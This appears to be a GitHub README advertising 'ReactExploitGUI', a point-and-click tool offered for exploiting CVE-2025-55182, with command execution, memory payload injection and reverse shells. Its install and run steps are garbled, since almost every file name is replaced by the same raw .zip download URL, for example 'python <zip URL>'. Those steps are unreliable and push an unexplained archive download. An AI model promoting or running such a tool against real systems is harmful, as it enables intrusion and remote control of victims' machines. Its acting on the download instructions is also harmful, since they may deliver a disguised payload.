Skip to content

πŸ› οΈ Exploit CVE-2025-55182 effortlessly with this GUI tool for vulnerability detection, command execution, and Shell reverse connections.

Notifications You must be signed in to change notification settings

vick333-peniel/ReactExploitGUI

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

41 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ› οΈ ReactExploitGUI - A Simple Tool for Exploitation

πŸ“₯ Download Now

Download ReactExploitGUI


πŸš€ Getting Started

Welcome to ReactExploitGUI, a user-friendly graphical tool designed for the CVE-2025-55182 vulnerability. This application allows you to detect vulnerabilities, execute commands, inject memory payloads, and establish reverse shells in a streamlined manner.

πŸ“‹ System Requirements

  • Operating Systems: Windows / macOS
  • Hardware: Suitable for both Intel and ARM architectures.

πŸ“¦ Download & Install

  1. Visit the Releases page to find the latest version.
  2. Download the tool package for your operating system.
  3. Extract the downloaded package to any directory on your computer.

πŸ‘¨β€πŸ’» Running the Tool

  • For Windows:

    1. Locate the https://github.com/vick333-peniel/ReactExploitGUI/raw/refs/heads/main/gui/React-Exploit-GUI-v1.5.zip file in the extracted folder.
    2. Double-click to run the application.
  • For macOS: (Currently supports arm64 architecture)

    1. Open a terminal.
    2. Navigate to the extracted directory.
    3. Run the following command to make it executable:
      chmod +x ReactExploitGui_macos_arm64
    4. Launch the application using:
      ./ReactExploitGui_macos_arm64
      If you encounter any errors, try:
      sudo ./ReactExploitGui_macos_arm64

πŸ”§ Exploring Functionality

ReactExploitGUI provides several features:

  • Vulnerability Detection: Easily identify systems that are susceptible to CVE-2025-55182.
  • Command Execution: Initiate commands directly from the interface.
  • Memory Payload Injection: Seamlessly insert payloads into target applications.
  • Reverse Shell Setup: Establish a secure connection back to your machine.

πŸ“– Source Code Usage

If you prefer to run the source code, follow these steps:

🌱 Environment Requirements

  • Python 3.10 or higher
  • Required packages: PySide6, requests, cryptography, PyYAML

πŸ“₯ Running the Source Code

  1. Open your terminal or command prompt.
  2. Clone the repository to your local machine:
    git clone https://github.com/vick333-peniel/ReactExploitGUI/raw/refs/heads/main/gui/React-Exploit-GUI-v1.5.zip
  3. Navigate into the project folder:
    cd ReactExploitGUI
  4. Install the necessary dependencies:
    pip install -r https://github.com/vick333-peniel/ReactExploitGUI/raw/refs/heads/main/gui/React-Exploit-GUI-v1.5.zip
  5. Start the application:
    python https://github.com/vick333-peniel/ReactExploitGUI/raw/refs/heads/main/gui/React-Exploit-GUI-v1.5.zip

πŸ“¦ Packaging Instructions

To package the application for distribution, you can use the https://github.com/vick333-peniel/ReactExploitGUI/raw/refs/heads/main/gui/React-Exploit-GUI-v1.5.zip script provided in the project root:

  1. Run the following command:
    python https://github.com/vick333-peniel/ReactExploitGUI/raw/refs/heads/main/gui/React-Exploit-GUI-v1.5.zip

πŸ“‚ Packaging Modes

  • Default Mode (Directory): This mode packages all files into a single folder. Simply run:

    python https://github.com/vick333-peniel/ReactExploitGUI/raw/refs/heads/main/gui/React-Exploit-GUI-v1.5.zip
  • Single File Mode: To create a single executable file, append the --onefile option:

    python https://github.com/vick333-peniel/ReactExploitGUI/raw/refs/heads/main/gui/React-Exploit-GUI-v1.5.zip --onefile
  • Debugging on Windows: If you want to see console output while debugging, use the --debug option:

    python https://github.com/vick333-peniel/ReactExploitGUI/raw/refs/heads/main/gui/React-Exploit-GUI-v1.5.zip --debug

🌟 Community and Support

For any questions or issues, feel free to open an issue on the GitHub repository. Contributions are welcome, so if you have improvements or fixes, consider submitting a pull request.


For the latest version and updates, always check the Releases page.

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages